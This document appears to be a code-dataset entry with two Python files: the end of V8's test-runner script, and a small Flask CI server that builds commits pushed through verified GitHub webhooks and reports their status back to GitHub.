right = ParseOperatorExpression(scan)
if not right:
return None
left = Operation(left, op, right)
return left
def ParseConditionalExpression(scan):
left = ParseOperatorExpression(scan)
if not left: return None
while scan.HasMore() and (scan.Current() == 'if'):
scan.Advance()
right = ParseOperatorExpression(scan)
if not right:
return None
left = Operation(left, 'if', right)
return left
LOGICALS = ["&&", "||", ","]
def ParseLogicalExpression(scan):
left = ParseConditionalExpression(scan)
if not left: return None
while scan.HasMore() and (scan.Current() in LOGICALS):
op = scan.Current()
scan.Advance()
right = ParseConditionalExpression(scan)
if not right:
return None
left = Operation(left, op, right)
return left
def ParseCondition(expr):
"""Parses a logical expression into an Expression object"""
tokens = Tokenizer(expr).Tokenize()
if not tokens:
print "Malformed expression: '%s'" % expr
return None
scan = Scanner(tokens)
ast = ParseLogicalExpression(scan)
if not ast:
print "Malformed expression: '%s'" % expr
return None
if scan.HasMore():
print "Malformed expression: '%s'" % expr
return None
return ast
class ClassifiedTest(object):
def __init__(self, case, outcomes):
self.case = case
self.outcomes = outcomes
def TestsIsolates(self):
return self.case.TestsIsolates()
class Configuration(object):
"""The parsed contents of a configuration file"""
def __init__(self, sections, defs):
self.sections = sections
self.defs = defs
def ClassifyTests(self, cases, env):
sections = [s for s in self.sections if s.condition.Evaluate(env, self.defs)]
all_rules = reduce(list.__add__, [s.rules for s in sections], [])
unused_rules = set(all_rules)
result = [ ]
all_outcomes = set([])
for case in cases:
matches = [ r for r in all_rules if r.Contains(case.path) ]
outcomes = set([])
for rule in matches:
outcomes = outcomes.union(rule.GetOutcomes(env, self.defs))
unused_rules.discard(rule)
if not outcomes:
outcomes = [PASS]
case.outcomes = outcomes
all_outcomes = all_outcomes.union(outcomes)
result.append(ClassifiedTest(case, outcomes))
return (result, list(unused_rules), all_outcomes)
class Section(object):
"""A section of the configuration file. Sections are enabled or
disabled prior to running the tests, based on their conditions"""
def __init__(self, condition):
self.condition = condition
self.rules = [ ]
def AddRule(self, rule):
self.rules.append(rule)
class Rule(object):
"""A single rule that specifies the expected outcome for a single
test."""
def __init__(self, raw_path, path, value):
self.raw_path = raw_path
self.path = path
self.value = value
def GetOutcomes(self, env, defs):
set = self.value.GetOutcomes(env, defs)
assert isinstance(set, ListSet)
return set.elms
def Contains(self, path):
if len(self.path) > len(path):
return False
for i in xrange(len(self.path)):
if not self.path[i].match(path[i]):
return False
return True
HEADER_PATTERN = re.compile(r'\[([^]]+)\]')
RULE_PATTERN = re.compile(r'\s*([^: ]*)\s*:(.*)')
DEF_PATTERN = re.compile(r'^def\s*(\w+)\s*=(.*)$')
PREFIX_PATTERN = re.compile(r'^\s*prefix\s+([\w\_\.\-\/]+)$')
def ReadConfigurationInto(path, sections, defs):
current_section = Section(Constant(True))
sections.append(current_section)
prefix = []
for line in utils.ReadLinesFrom(path):
header_match = HEADER_PATTERN.match(line)
if header_match:
condition_str = header_match.group(1).strip()
condition = ParseCondition(condition_str)
new_section = Section(condition)
sections.append(new_section)
current_section = new_section
continue
rule_match = RULE_PATTERN.match(line)
if rule_match:
path = prefix + SplitPath(rule_match.group(1).strip())
value_str = rule_match.group(2).strip()
value = ParseCondition(value_str)
if not value:
return False
current_section.AddRule(Rule(rule_match.group(1), path, value))
continue
def_match = DEF_PATTERN.match(line)
if def_match:
name = def_match.group(1).lower()
value = ParseCondition(def_match.group(2).strip())
if not value:
return False
defs[name] = value
continue
prefix_match = PREFIX_PATTERN.match(line)
if prefix_match:
prefix = SplitPath(prefix_match.group(1).strip())
continue
print "Malformed line: '%s'." % line
return False
return True
# ---------------
# --- M a i n ---
# ---------------
ARCH_GUESS = utils.GuessArchitecture()
TIMEOUT_DEFAULT = 60;
def BuildOptions():
result = optparse.OptionParser()
result.add_option("-m", "--mode", help="The test modes in which to run (comma-separated)",
default='release')
result.add_option("-v", "--verbose", help="Verbose output",
default=False, action="store_true")
result.add_option("-S", dest="scons_flags", help="Flag to pass through to scons",
default=[], action="append")
result.add_option("-p", "--progress",
help="The style of progress indicator (verbose, dots, color, mono)",
choices=PROGRESS_INDICATORS.keys(), default="mono")
result.add_option("--no-build", help="Don't build requirements",
default=False, action="store_true")
result.add_option("--build-only", help="Only build requirements, don't run the tests",
default=False, action="store_true")
result.add_option("--build-system", help="Build system in use (scons or gyp)",
default='scons')
result.add_option("--report", help="Print a summary of the tests to be run",
default=False, action="store_true")
result.add_option("--download-data", help="Download missing test suite data",
default=False, action="store_true")
result.add_option("-s", "--suite", help="A test suite",
default=[], action="append")
result.add_option("-t", "--timeout", help="Timeout in seconds",
default=-1, type="int")
result.add_option("--arch", help='The architecture to run tests for',
default='none')
result.add_option("--snapshot", help="Run the tests with snapshot turned on",
default=False, action="store_true")
result.add_option("--simulator", help="Run tests with architecture simulator",
default='none')
result.add_option("--special-command", default=None)
result.add_option("--valgrind", help="Run tests through valgrind",
default=False, action="store_true")
result.add_option("--cat", help="Print the source of the tests",
default=False, action="store_true")
result.add_option("--warn-unused", help="Report unused rules",
default=False, action="store_true")
result.add_option("-j", help="The number of parallel tasks to run",
default=1, type="int")
result.add_option("--time", help="Print timing information after running",
default=False, action="store_true")
result.add_option("--suppress-dialogs", help="Suppress Windows dialogs for crashing tests",
dest="suppress_dialogs", default=True, action="store_true")
result.add_option("--no-suppress-dialogs", help="Display Windows dialogs for crashing tests",
dest="suppress_dialogs", action="store_false")
result.add_option("--mips-arch-variant", help="mips architecture variant: mips32r1/mips32r2", default="mips32r2");
result.add_option("--shell", help="Path to V8 shell", default="d8")
result.add_option("--isolates", help="Whether to test isolates", default=False, action="store_true")
result.add_option("--store-unexpected-output",
help="Store the temporary JS files from tests that fails",
dest="store_unexpected_output", default=True, action="store_true")
result.add_option("--no-store-unexpected-output",
help="Deletes the temporary JS files from tests that fails",
dest="store_unexpected_output", action="store_false")
result.add_option("--stress-only",
help="Only run tests with --always-opt --stress-opt",
default=False, action="store_true")
result.add_option("--nostress",
help="Don't run crankshaft --always-opt --stress-op test",
default=False, action="store_true")
result.add_option("--shard-count",
help="Split testsuites into this number of shards",
default=1, type="int")
result.add_option("--shard-run",
help="Run this shard from the split up tests.",
default=1, type="int")
result.add_option("--noprof", help="Disable profiling support",
default=False)
return result
def ProcessOptions(options):
global VERBOSE
VERBOSE = options.verbose
options.mode = options.mode.split(',')
for mode in options.mode:
if not mode in ['debug', 'release']:
print "Unknown mode %s" % mode
return False
if options.simulator != 'none':
# Simulator argument was set. Make sure arch and simulator agree.
if options.simulator != options.arch:
if options.arch == 'none':
options.arch = options.simulator
else:
print "Architecture %s does not match sim %s" %(options.arch, options.simulator)
return False
# Ensure that the simulator argument is handed down to scons.
options.scons_flags.append("simulator=" + options.simulator)
else:
# If options.arch is not set by the command line and no simulator setting
# was found, set the arch to the guess.
if options.arch == 'none':
options.arch = ARCH_GUESS
options.scons_flags.append("arch=" + options.arch)
# Simulators are slow, therefore allow a longer default timeout.
if options.timeout == -1:
if options.arch in ['android', 'arm', 'mipsel']:
options.timeout = 2 * TIMEOUT_DEFAULT;
else:
options.timeout = TIMEOUT_DEFAULT;
if options.snapshot:
options.scons_flags.append("snapshot=on")
global VARIANT_FLAGS
if options.mips_arch_variant:
options.scons_flags.append("mips_arch_variant=" + options.mips_arch_variant)
if options.stress_only:
VARIANT_FLAGS = [['--stress-opt', '--always-opt']]
if options.nostress:
VARIANT_FLAGS = [[],['--nocrankshaft']]
if options.shell.endswith("d8"):
if options.special_command:
options.special_command += " --test"
else:
options.special_command = "@ --test"
if options.noprof:
options.scons_flags.append("prof=off")
options.scons_flags.append("profilingsupport=off")
if options.build_system == 'gyp':
if options.build_only:
print "--build-only not supported for gyp, please build manually."
options.build_only = False
return True
def DoSkip(case):
return (SKIP in case.outcomes) or (SLOW in case.outcomes)
REPORT_TEMPLATE = """\
Total: %(total)i tests
* %(skipped)4d tests will be skipped
* %(timeout)4d tests are expected to timeout sometimes
* %(nocrash)4d tests are expected to be flaky but not crash
* %(pass)4d tests are expected to pass
* %(fail_ok)4d tests are expected to fail that we won't fix
* %(fail)4d tests are expected to fail that we should fix\
"""
def PrintReport(cases):
def IsFlaky(o):
return (PASS in o) and (FAIL in o) and (not CRASH in o) and (not OKAY in o)
def IsFailOk(o):
return (len(o) == 2) and (FAIL in o) and (OKAY in o)
unskipped = [c for c in cases if not DoSkip(c)]
print REPORT_TEMPLATE % {
'total': len(cases),
'skipped': len(cases) - len(unskipped),
'timeout': len([t for t in unskipped if TIMEOUT in t.outcomes]),
'nocrash': len([t for t in unskipped if IsFlaky(t.outcomes)]),
'pass': len([t for t in unskipped if list(t.outcomes) == [PASS]]),
'fail_ok': len([t for t in unskipped if IsFailOk(t.outcomes)]),
'fail': len([t for t in unskipped if list(t.outcomes) == [FAIL]])
}
class Pattern(object):
def __init__(self, pattern):
self.pattern = pattern
self.compiled = None
def match(self, str):
if not self.compiled:
pattern = "^" + self.pattern.replace('*', '.*') + "$"
self.compiled = re.compile(pattern)
return self.compiled.match(str)
def __str__(self):
return self.pattern
def SplitPath(s):
stripped = [ c.strip() for c in s.split('/') ]
return [ Pattern(s) for s in stripped if len(s) > 0 ]
def GetSpecialCommandProcessor(value):
if (not value) or (value.find('@') == -1):
def ExpandCommand(args):
return args
return ExpandCommand
else:
pos = value.find('@')
import urllib
import shlex
prefix = shlex.split(urllib.unquote(value[:pos]))
suffix = shlex.split(urllib.unquote(value[pos+1:]))
def ExpandCommand(args):
return prefix + args + suffix
return ExpandCommand
BUILT_IN_TESTS = ['mjsunit', 'cctest', 'message', 'preparser']
def GetSuites(test_root):
def IsSuite(path):
return isdir(path) and exists(join(path, 'testcfg.py'))
return [ f for f in os.listdir(test_root) if IsSuite(join(test_root, f)) ]
def FormatTime(d):
millis = round(d * 1000) % 1000
return time.strftime("%M:%S.", time.gmtime(d)) + ("%03i" % millis)
def ShardTests(tests, options):
if options.shard_count < 2:
return tests
if options.shard_run < 1 or options.shard_run > options.shard_count:
print "shard-run not a valid number, should be in [1:shard-count]"
print "defaulting back to running all tests"
return tests
count = 0
shard = []
for test in tests:
if count % options.shard_count == options.shard_run - 1:
shard.append(test)
count += 1
return shard
def Main():
parser = BuildOptions()
(options, args) = parser.parse_args()
if not ProcessOptions(options):
parser.print_help()
return 1
workspace = abspath(join(dirname(sys.argv[0]), '..'))
suites = GetSuites(join(workspace, 'test'))
repositories = [TestRepository(join(workspace, 'test', name)) for name in suites]
repositories += [TestRepository(a) for a in options.suite]
root = LiteralTestSuite(repositories)
if len(args) == 0:
paths = [SplitPath(t) for t in BUILT_IN_TESTS]
else:
paths = [ ]
for arg in args:
path = SplitPath(arg)
paths.append(path)
# Check for --valgrind option. If enabled, we overwrite the special
# command flag with a command that uses the run-valgrind.py script.
if options.valgrind:
run_valgrind = join(workspace, "tools", "run-valgrind.py")
options.special_command = "python -u " + run_valgrind + " @"
if options.build_system == 'gyp':
SUFFIX['debug'] = ''
shell = abspath(options.shell)
buildspace = dirname(shell)
context = Context(workspace, buildspace, VERBOSE,
shell,
options.timeout,
GetSpecialCommandProcessor(options.special_command),
options.suppress_dialogs,
options.store_unexpected_output)
# First build the required targets
if not options.no_build:
reqs = [ ]
for path in paths:
reqs += root.GetBuildRequirements(path, context)
reqs = list(set(reqs))
if len(reqs) > 0:
if options.j != 1:
options.scons_flags += ['-j', str(options.j)]
if not BuildRequirements(context, reqs, options.mode, options.scons_flags):
return 1
# Just return if we are only building the targets for running the tests.
if options.build_only:
return 0
# Get status for tests
sections = [ ]
defs = { }
root.GetTestStatus(context, sections, defs)
config = Configuration(sections, defs)
# Download missing test suite data if requested.
if options.download_data:
for path in paths:
root.DownloadData(path, context)
# List the tests
all_cases = [ ]
all_unused = [ ]
unclassified_tests = [ ]
globally_unused_rules = None
for path in paths:
for mode in options.mode:
env = {
'mode': mode,
'system': utils.GuessOS(),
'arch': options.arch,
'simulator': options.simulator,
'isolates': options.isolates
}
test_list = root.ListTests([], path, context, mode, [])
unclassified_tests += test_list
(cases, unused_rules, all_outcomes) = config.ClassifyTests(test_list, env)
if globally_unused_rules is None:
globally_unused_rules = set(unused_rules)
else:
globally_unused_rules = globally_unused_rules.intersection(unused_rules)
all_cases += ShardTests(cases, options)
all_unused.append(unused_rules)
if options.cat:
visited = set()
for test in unclassified_tests:
key = tuple(test.path)
if key in visited:
continue
visited.add(key)
print "--- begin source: %s ---" % test.GetLabel()
source = test.GetSource().strip()
print source
print "--- end source: %s ---" % test.GetLabel()
return 0
if options.warn_unused:
for rule in globally_unused_rules:
print "Rule for '%s' was not used." % '/'.join([str(s) for s in rule.path])
if not options.isolates:
all_cases = [c for c in all_cases if not c.TestsIsolates()]
if options.report:
PrintReport(all_cases)
result = None
cases_to_run = [ c for c in all_cases if not DoSkip(c) ]
if len(cases_to_run) == 0:
print "No tests to run."
return 0
else:
try:
start = time.time()
if RunTestCases(cases_to_run, options.progress, options.j):
result = 0
else:
result = 1
duration = time.time() - start
except KeyboardInterrupt:
print "Interrupted"
return 1
if options.time:
# Write the times to stderr to make it easy to separate from the
# test output.
print
sys.stderr.write("--- Total time: %s ---\n" % FormatTime(duration))
timed_tests = [ t.case for t in cases_to_run if not t.case.duration is None ]
timed_tests.sort(lambda a, b: a.CompareTime(b))
index = 1
for entry in timed_tests[:20]:
t = FormatTime(entry.duration)
sys.stderr.write("%4i (%s) %s\n" % (index, t, entry.GetLabel()))
index += 1
return result
if __name__ == '__main__':
sys.exit(Main())
|
buildtester.py
|
#!/usr/bin/env python3
from flask import Flask, request, make_response, render_template
from flask.ext.github import GitHub, GitHubError
from collections import OrderedDict
import configparser
from datetime import datetime
import atexit
import hashlib
import hmac
import json
import os
import queue
import re
import signal
import subprocess
import sys
import threading
import time
PWD = os.path.abspath(os.path.dirname(__file__))
class Options:
"""
Container for application settings
"""
class files:
"""
Container for application file settings
"""
settings = os.path.join(PWD, 'app.ini')
storage = os.path.join(PWD, 'storage')
builds = os.path.join(storage, 'builds')
temp = os.path.join(storage, 'temp')
pickup = None
class app:
"""
Container for general build settings
"""
status_uri = None
status_endpoint = '/status/<sha1>'
push_endpoint = '/gh/push'
port = 7000
title = 'Example'
cleanup_frequency = 300
default_context = 'build'
class status:
"""
Container for possible build statuses
"""
success = 'The build succeeded'
error = 'The build failed due to an internal error'
failure = 'The build failed'
queued = 'The build is queued'
pending = 'The build is in progress'
class github:
"""
Container for GitHub settings
"""
access_token = None
webhooks_secret = None
repository = None
branch = None
status_endpoint = None
commit_uri = None
commands = OrderedDict()
# Global variables
QUEUE = queue.Queue()
WATCH = None
PROCESS = None
RUNNING = True
LOCK = threading.Lock()
GITHUB_LOCK = threading.Lock()
# Initialize Flask app
app = Flask(__name__)
# Initialize GitHub lib. We use a personal token for this and not a client
# id / secret
app.config['GITHUB_CLIENT_ID'] = ''
app.config['GITHUB_CLIENT_SECRET'] = ''
github = GitHub(app)
def cleanup_hash(sha1):
"""
Checks if a hash is valid. Returns the cleaned up hash if so, else False
:param sha1: The hash to check
:return: mixed
"""
sha1 = sha1.strip()
try:
if len(sha1) > 0 and int(sha1, 16) > 0:
# Hash is valid
return sha1
except ValueError:
print("Invalid sha1 commit: {sha1}".format(sha1=sha1))
# Hash is invalid
return False
def retry_stale_builds():
"""
Locates and reschedules stale builds
:return: None
"""
global QUEUE
for root, dirs, files in os.walk(Options.files.builds):
for file in files:
# Absolute filename
filename = os.path.join(Options.files.builds, file)
# Get file stats
stat = os.stat(filename)
if stat.st_size > 32:
# This file is > 32 bytes, meaning it is a completed build
continue
try:
# Wrap this whole thing in a super generic try-catch because
# of potential corruption
# Open file
with open(filename, 'r') as file_:
# JSON-decode file
data = json.load(file_)
if data.get('status') == 'pending':
print("Re-queuing stale job: {sha1}".format(sha1=file))
# Put back in the queue. It failed in the middle of a build
QUEUE.put(file)
# Stop processing and get back to the actual queue process
return
except Exception:
# Catch any exceptions
if os.path.getmtime(filename) < time.time() - 10:
print("Re-queuing corrupt job: {sha1}".format(sha1=file))
# Remove file
os.unlink(filename)
# If file was not modified in the last 10 seconds, lets
# consider it corrupt and re-queue
QUEUE.put(file)
def execute_command(command):
"""
Execute the provided command
:param command: A list of arguments
:return: A tuple containing the output and return code
"""
# Execute command
process = subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
# Return result
return process.communicate()[0].decode('utf-8'), process.returncode
def init_dirs():
"""
Initialize dirs. This creates necessary directories
:return: None
"""
# Initialize directories
for path in [Options.files.storage, Options.files.builds,
Options.files.temp]:
# Create directory
subprocess.call(['mkdir', '-p', path])
def init_files():
"""
Initialize files. This initializes the GIT repo
:return: None
"""
# Init dirs
init_dirs()
# Change working directory
os.chdir(Options.files.storage)
# Init repo
stdout, ret = execute_command(['git', 'clone', '--recursive',
Options.github.repository,
Options.files.temp, '-b',
Options.github.branch])
# Change working directory
os.chdir(Options.files.temp)
# Cleanup any untracked files/directories
execute_command(['git', 'clean', '-f', '-d'])
if ret != 0:
# Fetch remote repo
stdout, ret = execute_command(['git', 'fetch', 'origin',
Options.github.branch])
if ret != 0:
print("Fetch failed ({code}): {error}".format(error=stdout,
code=ret))
return False
# Hard reset to get to the right commit
stdout, ret = execute_command(['git', 'reset', '--hard', 'origin/' +
Options.github.branch])
if ret != 0:
print("Reset failed ({code}): {error}".format(error=stdout,
code=ret))
return False
return True
def write_build_file(data, status, sha1, context, write_file=True,
post_gh=True):
"""
Writes the data to the build file for the given hash
:param data: a list of data
:param status: the status of the build
:param sha1: the commit hash to use for the filename
:param context: The context of this status
:param write_file: Should we write the file?
:param post_gh: Should we post to GitHub?
:return: None
"""
global GITHUB_LOCK
print("Building {sha1} stage {stage}: {status}".format(sha1=sha1,
stage=context,
status=status))
if write_file:
# Path to file
path = os.path.join(Options.files.builds, sha1)
# Open data file
with open(path, 'w') as file_:
# Write data
if data is not None:
# Write a status + data
file_.write(json.dumps(dict(status=status,
data=data), indent=4))
else:
# Write a status only
file_.write(json.dumps(dict(status=status), indent=4))
if post_gh:
description = getattr(Options.status, status)
if status == 'queued':
# GitHub doesn't support a queued status
status = 'pending'
# Update GH status
data = dict(
state=status,
description=description,
context=context
)
if Options.app.status_uri is not None:
# Only set target url if it is configured
data['target_url'] = Options.app.status_uri.format(sha1=sha1)
# Acquire GH lock
GITHUB_LOCK.acquire()
try:
github.post(Options.github.status_endpoint.format(sha1=sha1), data)
except GitHubError as e:
sys.stderr.write("Error posting to GitHub: {err}\n".format(
err=str(e)))
finally:
# Release GH lock
GITHUB_LOCK.release()
def build(sha1):
"""
Builds the repo checked out to sha1
:param sha1: The commit to checkout
:return: None
"""
print("Building {sha1}".format(sha1=sha1))
# Initialize repo to the given sha1 commit
if not init_files():
# Mark as error
write_build_file(None, 'error', sha1, Options.app.default_context,
post_gh=False)
# Abort
return
data = list()
# Mark as pending
write_build_file(None, 'pending', sha1, Options.app.default_context,
post_gh=False)
# Checkout commit
stdout, ret = execute_command(['git', 'reset', '--hard', sha1])
data.append(dict(
cmd='Checkout',
out=stdout,
code=ret
))
if ret != 0:
write_build_file(data, 'failure', sha1, Options.app.default_context,
post_gh=False)
return
# Get the full SHA1 hash
stdout, ret = execute_command(['git', 'rev-parse', 'HEAD'])
if ret != 0:
data.append(dict(
cmd='Rev-parse',
out=stdout,
code=ret
))
write_build_file(data, 'failure', sha1,
Options.app.default_context, post_gh=False)
return
stdout = stdout.strip()
if stdout != sha1:
# Source and destination files
destination = os.path.join(Options.files.builds, stdout)
write_build_file([dict(redirect=stdout)], 'success', sha1,
Options.app.default_context, post_gh=False)
if os.path.exists(destination):
# No more to do
return
# Use full hash
sha1 = stdout
# Mark as pending
write_build_file(None, 'pending', sha1, Options.app.default_context)
good_contexts = list()
bad_context = None
for label, command in Options.commands.items():
# Expand tuple
context, command = command
if context != Options.app.default_context and context not in \
good_contexts:
# Mark as pending
write_build_file(None, 'pending', sha1, context, write_file=False)
# Execute command
stdout, ret = execute_command(command.split(" "))
data.append(dict(
cmd=label,
out=stdout,
code=ret
))
if ret == 0:
if context not in good_contexts:
# Add to list of good contexts
good_contexts.append(context)
else:
# Build failed
write_build_file(data, 'failure', sha1, context)
# Remove
if context in good_contexts:
good_contexts.remove(context)
bad_context = context
# Stop processing
break
written = False
status = 'success' if bad_context is None else 'failure'
for context in good_contexts:
# Write a success status
write_build_file(data, status, sha1, context,
write_file=not written)
written = True
if bad_context is not None and Options.app.default_context != bad_context:
# Mark as failure if there were any failures and the default context
# was not already used
write_build_file(None, 'failure', sha1, Options.app.default_context,
write_file=False)
elif bad_context is None and Options.app.default_context not in \
good_contexts:
# Mark as success if there were no failures and the default context
# was not already used
write_build_file(data, 'success', sha1, Options.app.default_context,
write_file=False)
# Init dirs
init_dirs()
def process_queue():
"""
Process the queue
:return: None
"""
global QUEUE
global RUNNING
# Process queue
while RUNNING:
# Get the next commit hash from the queue
try:
wait = Options.app.cleanup_frequency
if wait < .1:
# Wait at least .1s
wait = .1
# Try getting an item.
sha1 = QUEUE.get(True, wait)
# Start build
build(sha1)
except queue.Empty:
# There hasn't been anything to do for cleanup_frequency seconds,
# lets do some housekeeping
retry_stale_builds()
def watch_queue():
"""
Watches the file queue for changes
:return: None
"""
global RUNNING
global LOCK
global WATCH
global PROCESS
# Process queue
while RUNNING:
if Options.files.pickup is not None and \
os.path.exists(Options.files.pickup):
hashes = list()
# Acquire lock
LOCK.acquire()
# Open pickup file for reading
with open(Options.files.pickup, "r") as file_:
# Get all the hashes
for sha1 in file_:
sha1 = cleanup_hash(sha1)
if sha1:
hashes.append(sha1)
# Open pickup file for writing
with open(Options.files.pickup, "w") as file_:
# Truncate file
file_.seek(0)
file_.truncate()
# Release lock
LOCK.release()
for sha1 in hashes:
# Mark as queued
write_build_file(None, 'queued', sha1,
Options.app.default_context, post_gh=False)
# Add to queue
QUEUE.put(sha1)
# Sleep for .1 seconds before we look for more builds to perform
time.sleep(0.1)
def shutdown(signum, frame):
"""
We received a signal, so we need to shut down our child threads
:param signum: The signal number
:param frame: The frame info
:return: None
"""
global RUNNING
RUNNING = False
# Remove handler
signal.signal(signum, signal.SIG_DFL)
# Throw signal
os.kill(os.getpid(), signum)
@app.route('/')
def home():
"""
Displays the most recent builds
:return: response
"""
commits = list()
for root, dirs, files in os.walk(Options.files.builds):
for file in files:
# Add to collection
commits.append(file)
# Sort by last updated descending
commits = list(sorted(commits, key=lambda f: os.stat(os.path.join(
Options.files.builds, f)).st_mtime, reverse=True))
builds = list()
count = 0
for commit in commits:
# Increment counter
count += 1
# Full path
filename = os.path.join(Options.files.builds, commit)
data = dict()
if count <= 5:
# Only load data for the 5 most recent builds
with open(filename, 'r') as file_:
data = json.load(file_)
# Initialize required data
if not isinstance(data, dict):
data = dict()
data['status'] = data.get('status', '')
if not isinstance(data.get('data'), list):
data['data'] = list()
message = ''
redirect = False
if len(data['data']) > 0:
redirect = data['data'][0].get('redirect', False)
if redirect is not False:
data['data'][0] = dict(
cmd='Redirect',
code=0,
out='Redirects to {sha1}'.format(sha1=redirect)
)
message = 'Resolved from {} to {}'.format(commit, redirect)
commit = redirect
# Full path
filename = os.path.join(Options.files.builds, commit)
checkout = data['data'][0]
if checkout['cmd'] == 'Checkout' and checkout['code'] == 0:
result = re.search('^HEAD is now at [0-f]+\s*(.+$)',
checkout['out'])
if result:
# Get the actual message
message = result.group(1)
else:
# If the regexp didn't match for some reason, fall back
# to the raw data
message = checkout['out']
status_label, status_nice = resolve_status(data['status'])
# Get mtime
mtime = os.stat(filename).st_mtime
# Format mtime
mtime = datetime.fromtimestamp(mtime).strftime('%B %d, %Y %H:%M')
if redirect is not False:
status_nice = ''
builds.append(dict(sha1=commit,
date=mtime,
status_nice=status_nice,
status_label=status_label,
message=message))
return render_template('index.html', builds=builds,
title=Options.app.title)
def resolve_status(code):
"""
Get a label and status for the status code
:param code: The status to resolve
:return: A tuple containing the label and new status
"""
# Default label
status_label = 'info'
if code == 'success':
status_nice = 'Build Succeeded'
status_label = 'success'
elif code == 'error':
status_nice = 'Build Failed (Internal Error)'
status_label = 'danger'
elif code == 'failure':
status_nice = 'Build Failed'
status_label = 'danger'
elif code == 'queued':
status_nice = 'Build Queued'
elif code == 'pending':
status_nice = 'Build Running'
else:
status_nice = code
return status_label, status_nice
def build_status(sha1):
"""
Displays the build status for a sha1 commit
:param sha1: the sha1 commit
:return: response
"""
global LOCK
sha1 = cleanup_hash(sha1)
if sha1 is not False:
filename = os.path.join(Options.files.builds, sha1)
if sha1 is False:
data = dict()
data['data'] = list()
data['status'] = 'failure'
sha1 = 'INVALID'
data['message'] = 'Invalid commit requested'
elif os.path.exists(filename):
with open(filename) as file:
data = json.load(file)
if len(data['data']) > 0 and data['data'][0].get(
'redirect') is not None:
# Load the redirect
return build_status(data['data'][0].get('redirect'))
else:
# Acquire lock
LOCK.acquire()
if Options.files.pickup is not None:
# File-based queue
with open(Options.files.pickup, 'a') as file_:
file_.write(sha1 + "\n")
else:
# Memory queue only
# Mark as queued
write_build_file(None, 'queued', sha1, Options.app.default_context,
post_gh=False)
# Just store in memory
QUEUE.put(sha1)
# Release lock
LOCK.release()
data = dict(status='queued')
data['data'] = data.get('data', list())
data['status'] = data.get('status', '')
data['sha1'] = sha1
data['short_sha1'] = sha1[0:8]
data['message'] = ''
# Default label
data['status_label'], data['status_nice'] = resolve_status(data['status'])
if len(data['data']) > 0:
# Get the name of the latest commit
checkout = data['data'][0]
if checkout['cmd'] == 'Checkout' and checkout['code'] == 0:
result = re.search('^HEAD is now at [0-f]+\s*(.+$)',
checkout['out'])
if result:
# Get the actual message
data['message'] = result.group(1)
else:
# If the regexp didn't match for some reason, fall back to
# the raw data
data['message'] = checkout['out']
# Remove from collection
data['data'] = data['data'][1:]
data['commit_uri'] = Options.github.commit_uri.format(sha1=sha1)
data['title'] = Options.app.title
return render_template('status.html', **data)
def gh_push():
"""
Processes a GitHub push WebHook
:return: response
"""
global LOCK
if Options.github.webhooks_secret is not None:
# Get request signature
signature = request.headers.get('X-Hub-Signature')
if signature is None:
print("Unauthorized")
return make_response(('Unauthorized', 403))
# Get request data
data = request.get_data(as_text=True)
# Calculate HMAC digest
digest = hmac.new(Options.github.webhooks_secret.encode('utf-8'),
data.encode('utf-8'),
digestmod=hashlib.sha1)
if not hmac.compare_digest('sha1=' + digest.hexdigest(), signature):
print("Unauthorized: {sig}".format(sig=signature))
return make_response(('Unauthorized', 403))
# Get JSON request
req = request.get_json()
if req.get('ref') != 'refs/heads/' + Options.github.branch:
print('Skipping invalid ref: {ref}'.format(ref=req.get('ref')))
return make_response("Ignoring branch", 200)
sha1 = req.get('after')
# Acquire lock
LOCK.acquire()
if Options.files.pickup is not None:
# Write to pickup file
with open(Options.files.pickup, 'a') as file_:
file_.write(sha1 + "\n")
else:
# Mark as queued
write_build_file(None, 'queued', sha1, Options.app.default_context,
post_gh=False)
# Just store in memory
QUEUE.put(sha1)
# Release lock
LOCK.release()
return make_response(json.dumps('Starting build'), 200,
{'Content-Type': 'application/json'})
@github.access_token_getter
def token_getter():
"""
Returns the GitHub access token
:return: the token
"""
return Options.github.access_token
def initialize(argv=sys.argv[1:]):
"""
Initialize the server
:return: None
"""
global PROCESS
global RUNNING
global WATCH
if len(argv) > 0:
# Options file specified
Options.files.settings = argv[0]
try:
# Initialize config parser
parser = configparser.ConfigParser()
# Load config
parser.read(Options.files.settings)
# Get sections
sections = parser.sections()
# Remove invalid sections
sections = list(v for v in sections if hasattr(Options, v))
for section in sections:
# Grab the Options.{section} object so this is a bit cleaner
options_section = getattr(Options, section)
if isinstance(options_section, dict):
for key, val in parser.items(section):
# Fill up our dictionary. Because optionxform will make
# the key lowercase, but we don't want to replace that
# lest we make the entire file case-sensitive, just
# apply the title method to the keys
options_section[key.title()] = val
else:
for key in parser[section]:
# Iterate app section
if hasattr(options_section, key):
# If this is a valid option, replace the default
setattr(options_section, key, parser.get(section, key))
except configparser.Error as e:
print("Config parsing error: {err}".format(err=e.message))
sys.exit(1)
# Free memory
del parser
del sections
# Validate config
if Options.github.branch is None:
print("The GitHub branch must be configured!")
sys.exit(1)
if Options.files.pickup == '':
Options.files.pickup = None
try:
Options.app.port = int(Options.app.port)
except ValueError:
print("Invalid listen port specified!")
sys.exit(1)
try:
Options.app.cleanup_frequency = float(Options.app.cleanup_frequency)
except ValueError:
print("Invalid cleanup frequency specified!")
sys.exit(1)
# Parse commands
commands = OrderedDict()
for label, command in Options.commands.items():
if '|' in label:
context, label = label.split('|')
context = context.lower()
label = label.title()
else:
context = Options.app.default_context.lower()
# Add to collection
commands[label] = context, command
# Replace commands in options
Options.commands = commands
# Register routes
if Options.app.push_endpoint != '':
app.route(Options.app.push_endpoint, methods=['post'])(gh_push)
if Options.app.status_endpoint != '':
app.route(Options.app.status_endpoint, methods=['get'])(build_status)
# Initialize dirs
init_dirs()
# Register signal handlers
signal.signal(signal.SIGINT, shutdown)
signal.signal(signal.SIGTERM, shutdown)
signal.signal(signal.SIGHUP, shutdown)
# Register shutdown handler
atexit.register(init_dirs)
# Init threads
PROCESS = threading.Thread(target=process_queue)
if Options.files.pickup is not None:
# Only init the queue watching thread if there is a file queue
WATCH = threading.Thread(target=watch_queue)
# Start thread
PROCESS.start()
if Options.files.pickup is not None:
# Only start the queue watching thread if there is a file queue
WATCH.start()
def startup():
"""
Starts up the Flask server
:return: None
"""
app.run(port=Options.app.port)
def deinitialize():
"""
De-initializes the server
:return: None
"""
global RUNNING
global LOCK
global WATCH
global PROCESS
# Stop the threads
RUNNING = False
# Wait for threads to finish
PROCESS.join()
if Options.files.pickup is not None:
# Only wait on the queue watching thread if there is a file queue
WATCH.join()
if __name__ == '__main__':
initialize()
if Options.app.port != 0:
# Startup Flask if necessary
startup()
else:
# Wait for the process to finish
PROCESS.join()
deinitialize()
|
